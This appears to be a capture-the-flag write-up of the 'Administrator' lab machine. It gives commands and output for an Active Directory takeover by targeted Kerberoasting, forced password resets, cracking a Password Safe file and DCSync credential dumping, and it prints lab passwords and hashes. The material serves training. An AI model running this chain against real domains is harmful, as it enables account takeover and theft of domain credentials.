Overview
The machine starts by enumerating with given credentials discovering GenericWrite over Michael, so we perform targeted Kerberoasting that fails to crack, then change his password to find ForceChangePassword over Benjamin, changing his password to access FTP and retrieve a password safe file, cracking its master password to extract Emily's credentials and get a winrm shell, then abusing GenericWrite over Ethan to Kerberoast and crack his hash, using his DCSync rights to dump the Administrator hash and get shell as Administrator.
As is common in real life Windows
pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password:ichliebedich
Enumeration
As usual we're gonna start with nmap
nmap -sC -sV -vv -oA init 10.129.5.235
# Nmap 7.94SVN scan initiated Sat May 30 23:05:49 2026 as: nmap -sC -sV -vv -oA init 10.129.5.235
Nmap scan report for 10.129.5.235
Host is up, received conn-refused (0.20s latency).
Scanned at 2026-05-30 23:05:50 PDT for 55s
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
| _ SYST: Windows_NT
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-05-31 13:06:21Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 65205/tcp): CLEAN (Couldn't connect)
| Check 2 (port 43132/tcp): CLEAN (Couldn't connect)
| Check 3 (port 41532/udp): CLEAN (Failed to receive data)
| Check 4 (port 13232/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-05-31T13:06:32
| _ start_date: N/A
| _clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
and we got AD environment, DNS, LDAP, KRB, SMB, some RPC, and FTP so lets start with the given credentials
nxc smb 10.129.5.235 -u 'Olivia' -p 'ichliebedich'
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\Olivia:ichliebedichalways start with easy things and build you way up so test the given user against the easy win port which FTP in this case
nxc ftp 10.129.5.235 -u 'Olivia' -p 'ichliebedich'
FTP 10.129.5.235 21 10.129.5.235 [*] Banner: Microsoft FTP Service
FTP 10.129.5.235 21 10.129.5.235 [-] Olivia:ichliebedich (Response:530 User cannot log in, home directory inaccessible.)Bloodhound data
It didn't work out but LDAP did so lets get bloodhound ingester running
rusthound -d administrator.htb -i 10.129.5.235 -u 'Olivia' -p 'ichliebedich' -z
---------------------------------------------------
Initializing RustHound at 07:36:49 on 05/31/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
< SNIP>
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 11 users parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 61 groups parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 1 computers parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 1 ous parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 1 domains parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 2 gpos parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 21 containers parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] .//20260531073651_administrator-htb_rusthound.zip created!
RustHound Enumeration Completed at 07:36:51 on 05/31/26! Happy Graphing!and as we can see the given user got generic all over the user michael
we can try 3 different attacks
- targeted Kerberoasting → setup an account to be kerberoastable then kerberoast it
- Shadow Credentials attack → abuse
msDs-KeyCredentialLinkattribute i guess to add our own public key to get authentication without password change - change password → should be your last resort in actual Pentest and must get client approval
Lets start with Kerberoasting, and as you can see because we can write to the user we can add a fake SPN to it and get a TGS-REP and extract the hash
python3 /opt/scripts/targetedKerberoast/targetedKerberoast.py --dc-ip 10.129.5.235 -d administrator.htb -u 'Olivia' -p ichliebedich
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$e0cf1ef5a31f26b5a219f51a9d8411f8$744a8d6c784fc27707f023e73ac46e41e912bb51a2b5ea8338e52430fbca69f795e78df68510992fb26275f5db6b7da88727962fdf3431256618bb22863df308575c631cad6ec2a8e219152c5032eca0547c5c8f3a52bd65caad65c4c94bb22ca673da573db97b6740c171deae1d6fd832cdd993f050e24735eaec1f819ca02e0dc5be448c0971ae8ead77c464eba2141b15f188f3c30a9cbb80e5e53192ab51602cb0b2b5449b172b5c605e9daa478b58c0c64c677e34031c797b0b6ee3f6c3110190ed0fb6e2c59b5334abb94066d10b9ff3812b4990106d711449e47a0cc31d8aee8bdfc346be880baab14fcf8781f9b37b3f0a3e13fa023d770a5751f2ba858450f92f29b1f3674a3286e8ba795d82b4b324a6a177d4df0a30716705327f2ee4aec5669604c0969cae45df17d4c5940c872d384b0c2be335d488221aada06018036c23fad2c2ae506a69d028bea9a293fa14495de3a8228b473be3ba2ec095ef309ef2bddece2d23e0c2f9f095e923f2ad6292f71ade30bb53e346f8cbc5d938ca4a2b52dc8141db18ea324e7c21ef1e461dd20c1462c2317341080ffed9bfd1e265ec412d232ed2fbebd562cd4ca79de804ba03f0dc0f41b651ee87b37f6374536f54b031fe2c7694add4a62df740a5a29d7bd1db348de826c17b2c700c29646cff3cd75d6a693a884882ce59b51688711064171848270a6e3942b648276bf95364726a8e0522610db6781fac036b3f57552e67283d7fbae093386faaade1e046ea6c6e65d1d6b10ef1ffa14da4c3779f125237fc8b1759871708f565da9520714443676e016d83acee7d0ea9cb7f085933418a257334d5104d3b67dc3fb0bbc1d3a190155d2464a3c0c6b59e7e50aa7a2c1a13ef530d83e4754a3afade717af7aedc3bb44cebaec08290b3a458dcba0984f3863f33d266a23495bf482c7573e326fdec73fb7886f888d76960c2d3e4bdf10f04d977524a43f1a331de74d59d778aea8e39f590cced47371fb1bd1314b58ed3b97951d480886d138d94318486d19f950c9478c942a0f33ec198af187e02a11654367b0df63b61931f45b6267e285d8aa0e32ad2438326f08c92112b0ff24e71ca923e7f8506d8d6bca9709c6a6dc068bf3f84910fc779978fd2a67ebbb70e4d1e56587a2823746e34440d833cfea217511c3215784187328acac423abcfac48b0b83f5099596c37d6425911ec2fa6b7c9b332e965f010087bdd3df0f7fa4988c83e752b6810c61caa67edb829c603d002b287b2c4967869c2f1273902be347af2b53ecd030242d95c44005d1c9324545c1c7b1d9bbd2ac52b0930771d444bbf4ff2839c6e3ef6e54c5b73b02c15f1d38af4cfdccf4ff05a48005627016b6697e4af2437d9bba0fb294102ab4dc33fe92b3d50348b9cc53ba167fc7ac3d4e8f2747b0a871c62ab0ee8242ca671ceae5aca728ed0947c243c19265f51a3f856005d42ea1a43cf8dcbb8b9aa6726841fcc45ae9836dc5acf6408e9516c9548eaad8f559dwe still need to crack that hash, so I will use hashcat with the mode 13100 for the krb5tgs etype23 which is for RC4 hashing algorithm I guess
hashcat -a 0 -m 13100 michael.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting
< SNIP>
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrato...dbcd72
Time.Started.....: Sun May 31 07:39:47 2026 (20 secs)
Time.Estimated...: Sun May 31 07:40:07 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 757.3 kH/s (2.04ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: kristenanne -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Util: 90%
Started: Sun May 31 07:39:46 2026
Stopped: Sun May 31 07:40:09 2026and as you can see it didn't crack
the shadow creds attack doesn't work here cause there is no AD CS CA, the Shadow credential attack depends on the idea of certificate, PKINIT and public keys and there is no ADCS in place to provide those
User Michael
so lets try our last resort, password changing and see what that user can do
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ bloodyAD --host 10.129.5.235 --domain administrator.htb -u Olivia -p 'ichliebedich' set password michael 'Password123!'
[+] Password changed successfully!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u michael -p 'Password123!'
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\michael:Password123!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc ftp 10.129.5.235 -u michael -p 'Password123!'
FTP 10.129.5.235 21 10.129.5.235 [*] Banner: Microsoft FTP Service
FTP 10.129.5.235 21 10.129.5.235 [-] michael:Password123! (Response:530 User cannot log in, home directory inaccessible.)
and as you can see we got access on the user michael now so mark him as owned
User Benjamin
and lets take a look at michael in bloodhound
this time we got only ForceChangePassword so we really don't have any other option but to change the password so let's do it
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ bloodyAD --host 10.129.5.235 --domain administrator.htb -u michael -p 'Password123!' set password benjamin 'Password123!'
[+] Password changed successfully!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u benjamin -p 'Password123!'
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\benjamin:Password123!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc ftp 10.129.5.235 -u benjamin -p 'Password123!'
FTP 10.129.5.235 21 10.129.5.235 [*] Banner: Microsoft FTP Service
FTP 10.129.5.235 21 10.129.5.235 [+] benjamin:Password123!FTP as Benjamin
and as you can see we got access to FTP so lets take a look at the server we got some interesting files there
lftp -u benjamin,'Password123!' administrator.htb
lftp benjamin@administrator.htb:~> ls
10-05-24 09:13AM 952 Backup.psafe3
lftp benjamin@administrator.htb:/> get Backup.psafe3
952 bytes transferred psafe3 extension is a short for password safe which is some kind of database for a software that stores password, most of the password storage software force the user to set a master password which we don't have in this case
Password safe crack
Lets crack the password safe, first we'll extract the hash out of it then crack it
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ echo 'Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050' > safe.hash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ john safe.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ john safe.hash --show
Backu:tekieromucho
1 password hash cracked, 0 leftand it was a successful hit, lets open the safe
pwsafe Backup.psafe3it'll open this 
and we got 3 passwords for 3 users
cat creds.txt
emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emma: WwANQWnmJnGV07WQN8bMS7FMAbjNurI tried 3 of them but the only one that turned out to be working is Emily
└──╼ [★]$ nxc smb 10.129.5.235 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILUREShell as Emily
I will test to see if she got WINRM access, and she does
and we got the user
Back to Bloodhound data, and Emily got Generic Write over Ethan
so we can do targetedKerberoast to see if this user's hash is crackable
python3 /opt/scripts/targetedKerberoast/targetedKerberoast.py --dc-ip 10.129.5.235 -d administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f50b9ff0ef54ecd22ab3e7305555efc2$94022916b0464de30d753ebba34d981512490bdce7907abf62350e76e37df3bc4ba483aa544dc84459b069b96d82c799940588ba6307545e40806dbb2d77153b98d4f1ae62c554fff23ce21ffef4c4e7c8b1abbe2d31a9dd2deb27d2ff91799e52650d0797aff4a244e70295e20a18dcb89a130efd0d04d05b9ada75e5f89395b0216527724365d911647b616133fe3aabef76e833fc3d674454ac22b63380147c41ce3783abeba78dbaeb0eb6bcf30813ab8be809df8cd5a872d08ef3a4bbe6a0705beee8f665eb3d531c0aead4e2818d06005bcc2ce88ddf9f72c88bb17f45ecb310691ad99901856279c096abd545538d4c24faeed701e3b8eb22cc1489dbfb264721dac245efcd49ca7d73f0c91c2aeef2a016b8f2f3b2e65b07515a17bc32fda8428442ab30ac1fd561c379b1eee10b54030695ab3046e9ecb9fd3595dc4b5300584a9d3c95d62ae1c0d45ab7dea9b6451d41a18e83ec846c87e09bd312d301c22dd5147b1f8ddd2430d8617aa25f7484fb893cb6510943c110cdcefb84ff8921ee07cd707c22499617fbda4f1dfbdcd4bf21904a7fa347918f9e2a726bb760518f9529645bfad2bbc55b4c5cdedb77e1213bbab7544a34db6505b3aaab830a4c9c5e2a8de95249ee4e00782455d39de981f39549a3ab8638b09076158938b1a725e786b0bc07670f2e7d60185e2d431d7629fe3a0acac6b50d96cfe176d6c78482c9fe844a712fdc9d089d2110b77b30b8d2fe0df1c4269facaab2e425ede5419516a0bdae364eb437884dde2f942ed8a239a52a3c7083408d6ee040dc96e1c889dc74b0ca709cc9cc6f6d70329e1a0cc06bd927a39ca1007d673a47a06d4faa01b1d13f1140d06a58971aa837fd874d438c95f92985e4df77b691e83bf54c9fe35ae89ac047dbb9266c6c4f51c70da092077eb506679abc0415c81f03aad264dc789ceeea6604f11f11e74012d47201a0193aec913c69cc454bb8722ce87b995827fc389206ac1d9f86ea6a94ebd4d02094a1bf7089c7ac1a3ba26cac4ef025cf4613aa7c93d00f59a80661ba00ff18176d42283090c36dbc3922739fb088a9a0f3bb7572a38122bb3236080547ef7af02d24b0ee3e30d699a24cc1f1d59a80a937a3f055840deabe27119cdddb48851fa7587da1f1ea20545384a04dd6458440f21aee8c267b47b719441d74dd4884c499c4b6ad3b5d42fe2d17b84e11c6f5269e859a924bbd77c2c4551ad4ddac4448a52677816328c062a4caf9061e18e0c4409aec3ea61a583755171659fc87022c2247502c7e0435ae262c6f16160207ca048846ce8f0102aca90c263fd6d46b68bbf1888628e992331ec86900f4ad1c8bf6f60b7f72554e946108a2d21ec05d7ddb9a1dc022003176d568a8e79f7e4b617b99f0fb5a02aff727b4d98abe4a650f273d0829b9c99707b3f9e5d409ac4657aa87a977d98ec01fe27e02db54ff18bd94590df7317a4423556149c5b95899ccc8150d42d55ef610b54b3dd4005d78a0d639c9e4dc662b2be153e1User Ethan
Lets do the same we did before and crack the hash
hashcat -a 0 -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$be9d2222725dd4ea67d6fac76d3d7503$25860d6e21c57a177b76a0bb6f2cc3dc2ca077929104b0d04cdfd9488f1c3855f75af5a1926085bb96fabf1b82f6fb4a6fdb321e23aea362cad3d323cf7bc6c52419df1566933b6eeeffe03e97ebbf3b203c51485df7c2d81db82102b03d196935d590a3468d4d8b7b311136084f8e4f4ec0f06fb44e39d9164ce8fd62be75c135c0d28ac130303a9374009bbe2d59aae0657da6b74e8623f51f4caf9e5a21895685fbd8a75bcc3a1300d171f0c83d289ae01e5e4501e326701e02c8502fe7c776b2b3dfbead7359a89eed7590d04774778342315c8fec0744e6513c883eef3b9e34a554fd491725d91ec5d0337ca487bdb43e76f4e9dd23af59bc984067bb80e4ee383984d68d379f9ad18a78e4d9f09c6fd9a8e47f67b27f1f1c77ba4d02a8a9875c4c9de22362d7745783c7e8ed3066084d25aceac9ea49fd3cc068efbe9900b49df81ea05b2a1eeb1c4a0b29919e540e9213b4937baf7696d36379cf6924041e4d5a227fd80c267c1e0127e38670300166e56ac463afc6376143946c770371210e97f93451a7292ec40ee088a225b2b683a838be72a55a73076cd7ac1cc5a1342ca0ded7b63e3306ff66b93dd8c4f1a89def10ae3662047306f44172944d7164db66f8af107ed833fc8f81b9951fa7965c199b7e96369f7dfb97538c65ca3ada8ccd535e84613d8b042242f1c72094a349ca05bdd8482c26d1e01282b247e1ea4ff3c981796db7aa005429405ff213fbccc084ce19e97514bc2d19ed4cc3031b1ff69fd3640d81909d6ea09cc2d11df2467de5132c86585f5b50f1b02d04fe112933aa34b99274f3f4eb13d6deaf723281b223afacf6b5eef16142fa9a7675bb7d1956d20d318d3e900305797cd24c8c2d74699b5ef4ea462f620682d726a4c6c051d9d305540123241c041bbe318f8ad74fb6d16e92eca122253bc98aa0bfd01b2c0248ba56e3d79f145d53aab2104e4189b8a031abed778af6affecaf055a7e2fc3be69045a8b9540d2720deb3d1851070296a8ff3226d03b76cf37dc5956d8832546e3c7edb569799165e6f83ff4abbd436a6630006d56df8fdeec93a484f899cb96ad2dd6a8564abe5675791f68adbf74f9daaa6ac6022e318d54239265e977e82aa99655cfeb0b0172e65ddae1afcc42cafc13446be8165736f75dc72cfb5d1adf6f8fd5dfef3828d3efc1d2471dcdd5ca529b40191477edb1a945a380d0c973cec2e9ce4d94c483ba224ccea0fb90ba4e75249e20c48ec0a9353ed4491788274b87073277e2dea43680e3802b5d5630cac822c81919d91ed53564aa1d6d47002ac0050d64097954581195843d77827e5a6efa3197dcd0df1f885ab8798ee74bf4c97bfcd97b620843bc480c486f53d19393c25b9e82aa70a95d22b1ca28ab59fa32315941095da338ec0f596f6836f63b114621cdb5487c90a84b0c7e806fca6156dbfcdbfadfc8d2697abbf9a019f2a497d067dddf0f32678c10492e3da5032b4c60b3f70d5c3c0278d7feab8aebbc72686ed841701916ab9c8:limpbizkitand we get the password
Shell as administrator
lets look what this user can do
and we can dcsync where we trick the DC into sending the domain hashes via standard replication traffic
this time I won't need all domain creds so I'll ask for administrator only
secretsdump.py administrtor.htb/ethan:limpbizkit@10.129.5.235 -just-dc-user administrator
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
[*] Cleaning up... Lets login as administrator
and this machine is rooted
Resources
- https://jimmexploit.vercel.app/blog/kerberoasting (covers multiple Kerberoasting technique)
- https://i-tracing.com/blog/dacl-shadow-credentials/
- https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
- https://bloodhound.specterops.io/resources/edges/generic-write
- https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
- https://www.semperis.com/blog/dcsync-attack/